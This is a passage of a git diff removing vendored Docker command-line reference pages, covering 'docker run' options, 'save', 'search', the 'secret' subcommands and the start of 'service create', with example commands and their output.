Comment -lines need only be prefixed with `#` - -An example of a file passed with `--env-file` - - $ cat ./env.list - TEST_FOO=BAR - - # this is a comment - TEST_APP_DEST_HOST=10.10.0.127 - TEST_APP_DEST_PORT=8888 - _TEST_BAR=FOO - TEST_APP_42=magic - helloWorld=true - 123qwe=bar - org.spring.config=something - - # pass through this variable from the caller - TEST_PASSTHROUGH - $ TEST_PASSTHROUGH=howdy docker run --env-file ./env.list busybox env - PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin - HOSTNAME=5198e0745561 - TEST_FOO=BAR - TEST_APP_DEST_HOST=10.10.0.127 - TEST_APP_DEST_PORT=8888 - _TEST_BAR=FOO - TEST_APP_42=magic - helloWorld=true - TEST_PASSTHROUGH=howdy - HOME=/root - 123qwe=bar - org.spring.config=something - - $ docker run --env-file ./env.list busybox env - PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin - HOSTNAME=5198e0745561 - TEST_FOO=BAR - TEST_APP_DEST_HOST=10.10.0.127 - TEST_APP_DEST_PORT=8888 - _TEST_BAR=FOO - TEST_APP_42=magic - helloWorld=true - TEST_PASSTHROUGH= - HOME=/root - 123qwe=bar - org.spring.config=something - -### Set metadata on container (-l, --label, --label-file) - -A label is a `key=value` pair that applies metadata to a container. To label a container with two labels: - - $ docker run -l my-label --label com.example.foo=bar ubuntu bash - -The `my-label` key doesn't specify a value so the label defaults to an empty -string(`""`). To add multiple labels, repeat the label flag (`-l` or `--label`). - -The `key=value` must be unique to avoid overwriting the label value. If you -specify labels with identical keys but different values, each subsequent value -overwrites the previous. Docker uses the last `key=value` you supply. - -Use the `--label-file` flag to load multiple labels from a file. Delimit each -label in the file with an EOL mark. 
The example below loads labels from a -labels file in the current directory: - - $ docker run --label-file ./labels ubuntu bash - -The label-file format is similar to the format for loading environment -variables. (Unlike environment variables, labels are not visible to processes -running inside a container.) The following example illustrates a label-file -format: - - com.example.label1="a label" - - # this is a comment - com.example.label2=another\ label - com.example.label3 - -You can load multiple label-files by supplying multiple `--label-file` flags. - -For additional information on working with labels, see [*Labels - custom -metadata in Docker*](https://docs.docker.com/engine/userguide/labels-custom-metadata/) in the Docker User -Guide. - -### Connect a container to a network (--network) - -When you start a container use the `--network` flag to connect it to a network. -This adds the `busybox` container to the `my-net` network. - -```bash -$ docker run -itd --network=my-net busybox -``` - -You can also choose the IP addresses for the container with `--ip` and `--ip6` -flags when you start the container on a user-defined network. - -```bash -$ docker run -itd --network=my-net --ip=10.10.9.75 busybox -``` - -If you want to add a running container to a network use the `docker network connect` subcommand. - -You can connect multiple containers to the same network. Once connected, the -containers can communicate easily need only another container's IP address -or name. For `overlay` networks or custom plugins that support multi-host -connectivity, containers connected to the same multi-host network but launched -from different Engines can also communicate in this way. - -**Note**: Service discovery is unavailable on the default bridge network. -Containers can communicate via their IP addresses by default. To communicate -by name, they must be linked. - -You can disconnect a container from a network using the `docker network -disconnect` command. 
- -### Mount volumes from container (--volumes-from) - - $ docker run --volumes-from 777f7dc92da7 --volumes-from ba8c0c54f0f2:ro -i -t ubuntu pwd - -The `--volumes-from` flag mounts all the defined volumes from the referenced -containers. Containers can be specified by repetitions of the `--volumes-from` -argument. The container ID may be optionally suffixed with `:ro` or `:rw` to -mount the volumes in read-only or read-write mode, respectively. By default, -the volumes are mounted in the same mode (read write or read only) as -the reference container. - -Labeling systems like SELinux require that proper labels are placed on volume -content mounted into a container. Without a label, the security system might -prevent the processes running inside the container from using the content. By -default, Docker does not change the labels set by the OS. - -To change the label in the container context, you can add either of two suffixes -`:z` or `:Z` to the volume mount. These suffixes tell Docker to relabel file -objects on the shared volumes. The `z` option tells Docker that two containers -share the volume content. As a result, Docker labels the content with a shared -content label. Shared volume labels allow all containers to read/write content. -The `Z` option tells Docker to label the content with a private unshared label. -Only the current container can use a private volume. - -### Attach to STDIN/STDOUT/STDERR (-a) - -The `-a` flag tells `docker run` to bind to the container's `STDIN`, `STDOUT` -or `STDERR`. This makes it possible to manipulate the output and input as -needed. - - $ echo "test" | docker run -i -a stdin ubuntu cat - - -This pipes data into a container and prints the container's ID by attaching -only to the container's `STDIN`. - - $ docker run -a stderr ubuntu echo test - -This isn't going to print anything unless there's an error because we've -only attached to the `STDERR` of the container. 
The container's logs -still store what's been written to `STDERR` and `STDOUT`. - - $ cat somefile | docker run -i -a stdin mybuilder dobuild - -This is how piping a file into a container could be done for a build. -The container's ID will be printed after the build is done and the build -logs could be retrieved using `docker logs`. This is -useful if you need to pipe a file or something else into a container and -retrieve the container's ID once the container has finished running. - -### Add host device to container (--device) - - $ docker run --device=/dev/sdc:/dev/xvdc --device=/dev/sdd --device=/dev/zero:/dev/nulo -i -t ubuntu ls -l /dev/{xvdc,sdd,nulo} - brw-rw---- 1 root disk 8, 2 Feb 9 16:05 /dev/xvdc - brw-rw---- 1 root disk 8, 3 Feb 9 16:05 /dev/sdd - crw-rw-rw- 1 root root 1, 5 Feb 9 16:05 /dev/nulo - -It is often necessary to directly expose devices to a container. The `--device` -option enables that. For example, a specific block storage device or loop -device or audio device can be added to an otherwise unprivileged container -(without the `--privileged` flag) and have the application directly access it. - -By default, the container will be able to `read`, `write` and `mknod` these devices. -This can be overridden using a third `:rwm` set of options to each `--device` -flag: - - - $ docker run --device=/dev/sda:/dev/xvdc --rm -it ubuntu fdisk /dev/xvdc - - Command (m for help): q - $ docker run --device=/dev/sda:/dev/xvdc:r --rm -it ubuntu fdisk /dev/xvdc - You will not be able to write the partition table. - - Command (m for help): q - - $ docker run --device=/dev/sda:/dev/xvdc:rw --rm -it ubuntu fdisk /dev/xvdc - - Command (m for help): q - - $ docker run --device=/dev/sda:/dev/xvdc:m --rm -it ubuntu fdisk /dev/xvdc - fdisk: unable to open /dev/xvdc: Operation not permitted - -> **Note:** -> `--device` cannot be safely used with ephemeral devices. Block devices -> that may be removed should not be added to untrusted containers with -> `--device`. 
- -### Restart policies (--restart) - -Use Docker's `--restart` to specify a container's *restart policy*. A restart -policy controls whether the Docker daemon restarts a container after exit. -Docker supports the following restart policies: - - - - - - - - - - - - - - - - - - - - - - - - - - -
PolicyResult
no - Do not automatically restart the container when it exits. This is the - default. -
- - on-failure[:max-retries] - - - Restart only if the container exits with a non-zero exit status. - Optionally, limit the number of restart retries the Docker - daemon attempts. -
always - Always restart the container regardless of the exit status. - When you specify always, the Docker daemon will try to restart - the container indefinitely. The container will also always start - on daemon startup, regardless of the current state of the container. -
unless-stopped - Always restart the container regardless of the exit status, but - do not start it on daemon startup if the container has been put - to a stopped state before. -
- - $ docker run --restart=always redis - -This will run the `redis` container with a restart policy of **always** -so that if the container exits, Docker will restart it. - -More detailed information on restart policies can be found in the -[Restart Policies (--restart)](../run.md#restart-policies-restart) -section of the Docker run reference page. - -### Add entries to container hosts file (--add-host) - -You can add other hosts into a container's `/etc/hosts` file by using one or -more `--add-host` flags. This example adds a static address for a host named -`docker`: - - $ docker run --add-host=docker:10.180.0.1 --rm -it debian - root@f38c87f2a42d:/# ping docker - PING docker (10.180.0.1): 48 data bytes - 56 bytes from 10.180.0.1: icmp_seq=0 ttl=254 time=7.600 ms - 56 bytes from 10.180.0.1: icmp_seq=1 ttl=254 time=30.705 ms - ^C--- docker ping statistics --- - 2 packets transmitted, 2 packets received, 0% packet loss - round-trip min/avg/max/stddev = 7.600/19.152/30.705/11.553 ms - -Sometimes you need to connect to the Docker host from within your -container. To enable this, pass the Docker host's IP address to -the container using the `--add-host` flag. To find the host's address, -use the `ip addr show` command. - -The flags you pass to `ip addr show` depend on whether you are -using IPv4 or IPv6 networking in your containers. Use the following -flags for IPv4 address retrieval for a network device named `eth0`: - - $ HOSTIP=`ip -4 addr show scope global dev eth0 | grep inet | awk '{print \$2}' | cut -d / -f 1` - $ docker run --add-host=docker:${HOSTIP} --rm -it debian - -For IPv6 use the `-6` flag instead of the `-4` flag. For other network -devices, replace `eth0` with the correct device name (for example `docker0` -for the bridge device). - -### Set ulimits in container (--ulimit) - -Since setting `ulimit` settings in a container requires extra privileges not -available in the default container, you can set these using the `--ulimit` flag. 
-`--ulimit` is specified with a soft and hard limit as such: -`=[:]`, for example: - - $ docker run --ulimit nofile=1024:1024 --rm debian sh -c "ulimit -n" - 1024 - -> **Note:** -> If you do not provide a `hard limit`, the `soft limit` will be used -> for both values. If no `ulimits` are set, they will be inherited from -> the default `ulimits` set on the daemon. `as` option is disabled now. -> In other words, the following script is not supported: -> `$ docker run -it --ulimit as=1024 fedora /bin/bash` - -The values are sent to the appropriate `syscall` as they are set. -Docker doesn't perform any byte conversion. Take this into account when setting the values. - -#### For `nproc` usage - -Be careful setting `nproc` with the `ulimit` flag as `nproc` is designed by Linux to set the -maximum number of processes available to a user, not to a container. For example, start four -containers with `daemon` user: - - docker run -d -u daemon --ulimit nproc=3 busybox top - docker run -d -u daemon --ulimit nproc=3 busybox top - docker run -d -u daemon --ulimit nproc=3 busybox top - docker run -d -u daemon --ulimit nproc=3 busybox top - -The 4th container fails and reports "[8] System error: resource temporarily unavailable" error. -This fails because the caller set `nproc=3` resulting in the first three containers using up -the three processes quota set for the `daemon` user. - -### Stop container with signal (--stop-signal) - -The `--stop-signal` flag sets the system call signal that will be sent to the container to exit. -This signal can be a valid unsigned number that matches a position in the kernel's syscall table, for instance 9, -or a signal name in the format SIGNAME, for instance SIGKILL. - -### Optional security options (--security-opt) - -On Windows, this flag can be used to specify the `credentialspec` option. -The `credentialspec` must be in the format `file://spec.txt` or `registry://keyname`. 
- -### Stop container with timeout (--stop-timeout) - -The `--stop-timeout` flag sets the timeout (in seconds) that a pre-defined (see `--stop-signal`) system call -signal that will be sent to the container to exit. After timeout elapses the container will be killed with SIGKILL. - -### Specify isolation technology for container (--isolation) - -This option is useful in situations where you are running Docker containers on -Microsoft Windows. The `--isolation ` option sets a container's isolation -technology. On Linux, the only supported is the `default` option which uses -Linux namespaces. These two commands are equivalent on Linux: - -``` -$ docker run -d busybox top -$ docker run -d --isolation default busybox top -``` - -On Microsoft Windows, can take any of these values: - - -| Value | Description | -|-----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `default` | Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value. | -| `process` | Namespace isolation only. | -| `hyperv` | Hyper-V hypervisor partition-based isolation. | - -On Windows, the default isolation for client is `hyperv`, and for server is -`process`. 
Therefore when running on Windows server without a `daemon` option -set, these two commands are equivalent: -``` -$ docker run -d --isolation default busybox top -$ docker run -d --isolation process busybox top -``` - -If you have set the `--exec-opt isolation=hyperv` option on the Docker `daemon`, -if running on Windows server, any of these commands also result in `hyperv` isolation: - -``` -$ docker run -d --isolation default busybox top -$ docker run -d --isolation hyperv busybox top -``` - -### Configure namespaced kernel parameters (sysctls) at runtime - -The `--sysctl` sets namespaced kernel parameters (sysctls) in the -container. For example, to turn on IP forwarding in the containers -network namespace, run this command: - - $ docker run --sysctl net.ipv4.ip_forward=1 someimage - - -> **Note**: Not all sysctls are namespaced. Docker does not support changing sysctls -> inside of a container that also modify the host system. As the kernel -> evolves we expect to see more sysctls become namespaced. - -#### Currently supported sysctls - - `IPC Namespace`: - - kernel.msgmax, kernel.msgmnb, kernel.msgmni, kernel.sem, kernel.shmall, kernel.shmmax, kernel.shmmni, kernel.shm_rmid_forced - Sysctls beginning with fs.mqueue.* - - If you use the `--ipc=host` option these sysctls will not be allowed. - - `Network Namespace`: - Sysctls beginning with net.* - - If you use the `--network=host` option using these sysctls will not be allowed. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/save.md b/vendor/github.com/docker/docker/docs/reference/commandline/save.md deleted file mode 100644 index 88a5fed103..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/save.md +++ /dev/null @@ -1,45 +0,0 @@ ---- -title: "save" -description: "The save command description and usage" -keywords: "tarred, repository, backup" ---- - - - -# save - -```markdown -Usage: docker save [OPTIONS] IMAGE [IMAGE...] 
- -Save one or more images to a tar archive (streamed to STDOUT by default) - -Options: - --help Print usage - -o, --output string Write to a file, instead of STDOUT -``` - -Produces a tarred repository to the standard output stream. -Contains all parent layers, and all tags + versions, or specified `repo:tag`, for -each argument provided. - -It is used to create a backup that can then be used with `docker load` - - $ docker save busybox > busybox.tar - $ ls -sh busybox.tar - 2.7M busybox.tar - $ docker save --output busybox.tar busybox - $ ls -sh busybox.tar - 2.7M busybox.tar - $ docker save -o fedora-all.tar fedora - $ docker save -o fedora-latest.tar fedora:latest - -It is even useful to cherry-pick particular tags of an image repository - - $ docker save -o ubuntu.tar ubuntu:lucid ubuntu:saucy diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/search.md b/vendor/github.com/docker/docker/docs/reference/commandline/search.md deleted file mode 100644 index 31faf37375..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/search.md +++ /dev/null @@ -1,134 +0,0 @@ ---- -title: "search" -description: "The search command description and usage" -keywords: "search, hub, images" ---- - - - -# search - -```markdown -Usage: docker search [OPTIONS] TERM - -Search the Docker Hub for images - -Options: - -f, --filter value Filter output based on conditions provided (default []) - - is-automated=(true|false) - - is-official=(true|false) - - stars= - image has at least 'number' stars - --help Print usage - --limit int Max number of search results (default 25) - --no-trunc Don't truncate output -``` - -Search [Docker Hub](https://hub.docker.com) for images - -See [*Find Public Images on Docker Hub*](https://docs.docker.com/engine/tutorials/dockerrepos/#searching-for-images) for -more details on finding shared images from the command line. 
- -> **Note:** -> Search queries will only return up to 25 results - -## Examples - -### Search images by name - -This example displays images with a name containing 'busybox': - - $ docker search busybox - NAME DESCRIPTION STARS OFFICIAL AUTOMATED - busybox Busybox base image. 316 [OK] - progrium/busybox 50 [OK] - radial/busyboxplus Full-chain, Internet enabled, busybox made... 8 [OK] - odise/busybox-python 2 [OK] - azukiapp/busybox This image is meant to be used as the base... 2 [OK] - ofayau/busybox-jvm Prepare busybox to install a 32 bits JVM. 1 [OK] - shingonoide/archlinux-busybox Arch Linux, a lightweight and flexible Lin... 1 [OK] - odise/busybox-curl 1 [OK] - ofayau/busybox-libc32 Busybox with 32 bits (and 64 bits) libs 1 [OK] - peelsky/zulu-openjdk-busybox 1 [OK] - skomma/busybox-data Docker image suitable for data volume cont... 1 [OK] - elektritter/busybox-teamspeak Lightweight teamspeak3 container based on... 1 [OK] - socketplane/busybox 1 [OK] - oveits/docker-nginx-busybox This is a tiny NginX docker image based on... 0 [OK] - ggtools/busybox-ubuntu Busybox ubuntu version with extra goodies 0 [OK] - nikfoundas/busybox-confd Minimal busybox based distribution of confd 0 [OK] - openshift/busybox-http-app 0 [OK] - jllopis/busybox 0 [OK] - swyckoff/busybox 0 [OK] - powellquiring/busybox 0 [OK] - williamyeh/busybox-sh Docker image for BusyBox's sh 0 [OK] - simplexsys/busybox-cli-powered Docker busybox images, with a few often us... 0 [OK] - fhisamoto/busybox-java Busybox java 0 [OK] - scottabernethy/busybox 0 [OK] - marclop/busybox-solr - -### Display non-truncated description (--no-trunc) - -This example displays images with a name containing 'busybox', -at least 3 stars and the description isn't truncated in the output: - - $ docker search --stars=3 --no-trunc busybox - NAME DESCRIPTION STARS OFFICIAL AUTOMATED - busybox Busybox base image. 325 [OK] - progrium/busybox 50 [OK] - radial/busyboxplus Full-chain, Internet enabled, busybox made from scratch. 
Comes in git and cURL flavors. 8 [OK] - -## Limit search results (--limit) - -The flag `--limit` is the maximum number of results returned by a search. This value could -be in the range between 1 and 100. The default value of `--limit` is 25. - - -## Filtering - -The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there is more -than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`) - -The currently supported filters are: - -* stars (int - number of stars the image has) -* is-automated (true|false) - is the image automated or not -* is-official (true|false) - is the image official or not - - -### stars - -This example displays images with a name containing 'busybox' and at -least 3 stars: - - $ docker search --filter stars=3 busybox - NAME DESCRIPTION STARS OFFICIAL AUTOMATED - busybox Busybox base image. 325 [OK] - progrium/busybox 50 [OK] - radial/busyboxplus Full-chain, Internet enabled, busybox made... 8 [OK] - - -### is-automated - -This example displays images with a name containing 'busybox' -and are automated builds: - - $ docker search --filter is-automated busybox - NAME DESCRIPTION STARS OFFICIAL AUTOMATED - progrium/busybox 50 [OK] - radial/busyboxplus Full-chain, Internet enabled, busybox made... 8 [OK] - -### is-official - -This example displays images with a name containing 'busybox', at least -3 stars and are official builds: - - $ docker search --filter "is-official=true" --filter "stars=3" busybox - NAME DESCRIPTION STARS OFFICIAL AUTOMATED - progrium/busybox 50 [OK] - radial/busyboxplus Full-chain, Internet enabled, busybox made... 
8 [OK] diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md deleted file mode 100644 index aebcebbcdd..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/secret_create.md +++ /dev/null @@ -1,90 +0,0 @@ ---- -title: "secret create" -description: "The secret create command description and usage" -keywords: ["secret, create"] ---- - - - -# secret create - -```Markdown -Usage: docker secret create [OPTIONS] SECRET file|- - -Create a secret from a file or STDIN as content - -Options: - --help Print usage - -l, --label list Secret labels (default []) -``` - -Creates a secret using standard input or from a file for the secret content. You must run this -command on a manager node. - -## Examples - -### Create a secret - -```bash -$ echo | docker secret create my_secret - -mhv17xfe3gh6xc4rij5orpfds - -$ docker secret ls -ID NAME CREATED UPDATED SIZE -mhv17xfe3gh6xc4rij5orpfds my_secret 2016-10-27 23:25:43.909181089 +0000 UTC 2016-10-27 23:25:43.909181089 +0000 UTC 1679 -``` - -### Create a secret with a file - -```bash -$ docker secret create my_secret ./secret.json -mhv17xfe3gh6xc4rij5orpfds - -$ docker secret ls -ID NAME CREATED UPDATED SIZE -mhv17xfe3gh6xc4rij5orpfds my_secret 2016-10-27 23:25:43.909181089 +0000 UTC 2016-10-27 23:25:43.909181089 +0000 UTC 1679 -``` - -### Create a secret with labels - -```bash -$ docker secret create --label env=dev --label rev=20161102 my_secret ./secret.json -jtn7g6aukl5ky7nr9gvwafoxh - -$ docker secret inspect my_secret -[ - { - "ID": "jtn7g6aukl5ky7nr9gvwafoxh", - "Version": { - "Index": 541 - }, - "CreatedAt": "2016-11-03T20:54:12.924766548Z", - "UpdatedAt": "2016-11-03T20:54:12.924766548Z", - "Spec": { - "Name": "my_secret", - "Labels": { - "env": "dev", - "rev": "20161102" - }, - "Data": null - }, - "Digest": "sha256:4212a44b14e94154359569333d3fc6a80f6b9959dfdaff26412f4b2796b1f387", - 
"SecretSize": 1679 - } -] - -``` - - -## Related information - -* [secret inspect](secret_inspect.md) -* [secret ls](secret_ls.md) -* [secret rm](secret_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md deleted file mode 100644 index de878f74e4..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/secret_inspect.md +++ /dev/null @@ -1,85 +0,0 @@ ---- -title: "secret inspect" -description: "The secret inspect command description and usage" -keywords: ["secret, inspect"] ---- - - - -# secret inspect - -```Markdown -Usage: docker secret inspect [OPTIONS] SECRET [SECRET...] - -Display detailed information on one or more secrets - -Options: - -f, --format string Format the output using the given Go template - --help Print usage -``` - - -Inspects the specified secret. This command has to be run targeting a manager -node. - -By default, this renders all results in a JSON array. If a format is specified, -the given template will be executed for each result. - -Go's [text/template](http://golang.org/pkg/text/template/) package -describes all the details of the format. - -## Examples - -### Inspecting a secret by name or ID - -You can inspect a secret, either by its *name*, or *ID* - -For example, given the following secret: - -```bash -$ docker secret ls -ID NAME CREATED UPDATED -mhv17xfe3gh6xc4rij5orpfds secret.json 2016-10-27 23:25:43.909181089 +0000 UTC 2016-10-27 23:25:43.909181089 +0000 UTC -``` - -```bash -$ docker secret inspect secret.json -[ - { - "ID": "mhv17xfe3gh6xc4rij5orpfds", - "Version": { - "Index": 1198 - }, - "CreatedAt": "2016-10-27T23:25:43.909181089Z", - "UpdatedAt": "2016-10-27T23:25:43.909181089Z", - "Spec": { - "Name": "secret.json" - } - } -] -``` - -### Formatting secret output - -You can use the --format option to obtain specific information about a -secret. 
The following example command outputs the creation time of the -secret. - -```bash{% raw %} -$ docker secret inspect --format='{{.CreatedAt}}' mhv17xfe3gh6xc4rij5orpfds -2016-10-27 23:25:43.909181089 +0000 UTC -{% endraw %}``` - - -## Related information - -* [secret create](secret_create.md) -* [secret ls](secret_ls.md) -* [secret rm](secret_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md deleted file mode 100644 index 6b34fc2146..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/secret_ls.md +++ /dev/null @@ -1,43 +0,0 @@ ---- -title: "secret ls" -description: "The secret ls command description and usage" -keywords: ["secret, ls"] ---- - - - -# secret ls - -```Markdown -Usage: docker secret ls [OPTIONS] - -List secrets - -Aliases: - ls, list - -Options: - -q, --quiet Only display IDs -``` - -Run this command on a manager node to list the secrets in the Swarm. - -## Examples - -```bash -$ docker secret ls -ID NAME CREATED UPDATED -mhv17xfe3gh6xc4rij5orpfds secret.json 2016-10-27 23:25:43.909181089 +0000 UTC 2016-10-27 23:25:43.909181089 +0000 UTC -``` -## Related information - -* [secret create](secret_create.md) -* [secret inspect](secret_inspect.md) -* [secret rm](secret_rm.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md deleted file mode 100644 index f504b1ba4f..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/secret_rm.md +++ /dev/null @@ -1,48 +0,0 @@ ---- -title: "secret rm" -description: "The secret rm command description and usage" -keywords: ["secret, rm"] ---- - - - -# secret rm - -```Markdown -Usage: docker secret rm SECRET [SECRET...] 
- -Remove one or more secrets - -Aliases: - rm, remove - -Options: - --help Print usage -``` - -Removes the specified secrets from the swarm. This command has to be run -targeting a manager node. - -This example removes a secret: - -```bash -$ docker secret rm secret.json -sapth4csdo5b6wz2p5uimh5xg -``` - -> **Warning**: Unlike `docker rm`, this command does not ask for confirmation -> before removing a secret. - - -## Related information - -* [secret create](secret_create.md) -* [secret inspect](secret_inspect.md) -* [secret ls](secret_ls.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/service_create.md b/vendor/github.com/docker/docker/docs/reference/commandline/service_create.md deleted file mode 100644 index c9e298096b..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/service_create.md +++ /dev/null @@ -1,556 +0,0 @@ ---- -title: "service create" -description: "The service create command description and usage" -keywords: "service, create" ---- - - - -# service create - -```Markdown -Usage: docker service create [OPTIONS] IMAGE [COMMAND] [ARG...] 
- -Create a new service - -Options: - --constraint list Placement constraints (default []) - --container-label list Container labels (default []) - --dns list Set custom DNS servers (default []) - --dns-option list Set DNS options (default []) - --dns-search list Set custom DNS search domains (default []) - --endpoint-mode string Endpoint mode (vip or dnsrr) - -e, --env list Set environment variables (default []) - --env-file list Read in a file of environment variables (default []) - --group list Set one or more supplementary user groups for the container (default []) - --health-cmd string Command to run to check health - --health-interval duration Time between running the check (ns|us|ms|s|m|h) - --health-retries int Consecutive failures needed to report unhealthy - --health-timeout duration Maximum time to allow one check to run (ns|us|ms|s|m|h) - --help Print usage - --host list Set one or more custom host-to-IP mappings (host:ip) (default []) - --hostname string Container hostname - -l, --label list Service labels (default []) - --limit-cpu decimal Limit CPUs (default 0.000) - --limit-memory bytes Limit Memory (default 0 B) - --log-driver string Logging driver for service - --log-opt list Logging driver options (default []) - --mode string Service mode (replicated or global) (default "replicated") - --mount mount Attach a filesystem mount to the service - --name string Service name - --network list Network attachments (default []) - --no-healthcheck Disable any container-specified HEALTHCHECK - -p, --publish port Publish a port as a node port - --replicas uint Number of tasks - --reserve-cpu decimal Reserve CPUs (default 0.000) - --reserve-memory bytes Reserve Memory (default 0 B) - --restart-condition string Restart when condition is met (none, on-failure, or any) - --restart-delay duration Delay between restart attempts (ns|us|ms|s|m|h) - --restart-max-attempts uint Maximum number of restarts before giving up - --restart-window duration Window used to 
evaluate the restart policy (ns|us|ms|s|m|h) - --secret secret Specify secrets to expose to the service - --stop-grace-period duration Time to wait before force killing a container (ns|us|ms|s|m|h) - -t, --tty Allocate a pseudo-TTY - --update-delay duration Delay between updates (ns|us|ms|s|m|h) (default 0s) - --update-failure-action string Action on update failure (pause|continue) (default "pause") - --update-max-failure-ratio float Failure rate to tolerate during an update - --update-monitor duration Duration after each task update to monitor for failure (ns|us|ms|s|m|h) (default 0s) - --update-parallelism uint Maximum number of tasks updated simultaneously (0 to update all at once) (default 1) - -u, --user string Username or UID (format: [:]) - --with-registry-auth Send registry authentication details to swarm agents - -w, --workdir string Working directory inside the container -``` - -Creates a service as described by the specified parameters. You must run this -command on a manager node. - -## Examples - -### Create a service - -```bash -$ docker service create --name redis redis:3.0.6 -dmu1ept4cxcfe8k8lhtux3ro3 - -$ docker service create --mode global --name redis2 redis:3.0.6 -a8q9dasaafudfs8q8w32udass - -$ docker service ls -ID NAME MODE REPLICAS IMAGE -dmu1ept4cxcf redis replicated 1/1 redis:3.0.6 -a8q9dasaafud redis2 global 1/1 redis:3.0.6 -``` - -### Create a service with 5 replica tasks (--replicas) - -Use the `--replicas` flag to set the number of replica tasks for a replicated -service. The following command creates a `redis` service with `5` replica tasks: - -```bash -$ docker service create --name redis --replicas=5 redis:3.0.6 -4cdgfyky7ozwh3htjfw0d12qv -``` - -The above command sets the *desired* number of tasks for the service. Even -though the command returns immediately, actual scaling of the service may take -some time. The `REPLICAS` column shows both the *actual* and *desired* number -of replica tasks for the service. 
- -In the following example the desired state is `5` replicas, but the current -number of `RUNNING` tasks is `3`: - -```bash -$ docker service ls -ID NAME MODE REPLICAS IMAGE -4cdgfyky7ozw redis replicated 3/5 redis:3.0.7 -``` - -Once all the tasks are created and `RUNNING`, the actual number of tasks is -equal to the desired number: - -```bash -$ docker service ls -ID NAME MODE REPLICAS IMAGE -4cdgfyky7ozw redis replicated 5/5 redis:3.0.7 -``` - -### Create a service with secrets -Use the `--secret` flag to give a container access to a -[secret](secret_create.md). - -Create a service specifying a secret: - -```bash -$ docker service create --name redis --secret secret.json redis:3.0.6 -4cdgfyky7ozwh3htjfw0d12qv -``` - -Create a service specifying the secret, target, user/group ID and mode: - -```bash -$ docker service create --name redis \ - --secret source=ssh-key,target=ssh \ - --secret source=app-key,target=app,uid=1000,gid=1001,mode=0400 \ - redis:3.0.6 -4cdgfyky7ozwh3htjfw0d12qv -``` - -Secrets are located in `/run/secrets` in the container. If no target is -specified, the name of the secret will be used as the in memory file in the -container. If a target is specified, that will be the filename. In the -example above, two files will be created: `/run/secrets/ssh` and -`/run/secrets/app` for each of the secret targets specified. - -### Create a service with a rolling update policy - -```bash -$ docker service create \ - --replicas 10 \ - --name redis \ - --update-delay 10s \ - --update-parallelism 2 \ - redis:3.0.6 -``` - -When you run a [service update](service_update.md), the scheduler updates a -maximum of 2 tasks at a time, with `10s` between updates. For more information, -refer to the [rolling updates -tutorial](https://docs.docker.com/engine/swarm/swarm-tutorial/rolling-update/). - -### Set environment variables (-e, --env) - -This sets environmental variables for all tasks in a service. 
For example: - -```bash -$ docker service create --name redis_2 --replicas 5 --env MYVAR=foo redis:3.0.6 -``` - -### Create a docker service with specific hostname (--hostname) - -This option sets the docker service containers hostname to a specific string. For example: -```bash -$ docker service create --name redis --hostname myredis redis:3.0.6 -``` -### Set metadata on a service (-l, --label) - -A label is a `key=value` pair that applies metadata to a service. To label a -service with two labels: - -```bash -$ docker service create \ - --name redis_2 \ - --label com.example.foo="bar" - --label bar=baz \ - redis:3.0.6 -``` - -For more information about labels, refer to [apply custom -metadata](https://docs.docker.com/engine/userguide/labels-custom-metadata/). - -### Add bind-mounts or volumes - -Docker supports two different kinds of mounts, which allow containers to read to -or write from files or directories on other containers or the host operating -system. These types are _data volumes_ (often referred to simply as volumes) and -_bind-mounts_. - -Additionally, Docker also supports tmpfs mounts. - -A **bind-mount** makes a file or directory on the host available to the -container it is mounted within. A bind-mount may be either read-only or -read-write. For example, a container might share its host's DNS information by -means of a bind-mount of the host's `/etc/resolv.conf` or a container might -write logs to its host's `/var/log/myContainerLogs` directory. If you use -bind-mounts and your host and containers have different notions of permissions, -access controls, or other such details, you will run into portability issues. - -A **named volume** is a mechanism for decoupling persistent data needed by your -container from the image used to create the container and from the host machine. -Named volumes are created and managed by Docker, and a named volume persists -even when no container is currently using it. 
Data in named volumes can be -shared between a container and the host machine, as well as between multiple -containers. Docker uses a _volume driver_ to create, manage, and mount volumes. -You can back up or restore volumes using Docker commands. - -A **tmpfs** mounts a tmpfs inside a container for volatile data. - -Consider a situation where your image starts a lightweight web server. You could -use that image as a base image, copy in your website's HTML files, and package -that into another image. Each time your website changed, you'd need to update -the new image and redeploy all of the containers serving your website. A better -solution is to store the website in a named volume which is attached to each of -your web server containers when they start. To update the website, you just -update the named volume. - -For more information about named volumes, see -[Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/). - -The following table describes options which apply to both bind-mounts and named -volumes in a service: - -| Option | Required | Description -|:-----------------------------------------|:--------------------------|:----------------------------------------------------------------------------------------- -| **type** | | The type of mount, can be either `volume`, `bind`, or `tmpfs`. Defaults to `volume` if no type is specified.

  • `volume`: mounts a [managed volume](volume_create.md) into the container.
  • `bind`: bind-mounts a directory or file from the host into the container.
  • `tmpfs`: mount a tmpfs in the container
-| **src** or **source** | for `type=bind` only |
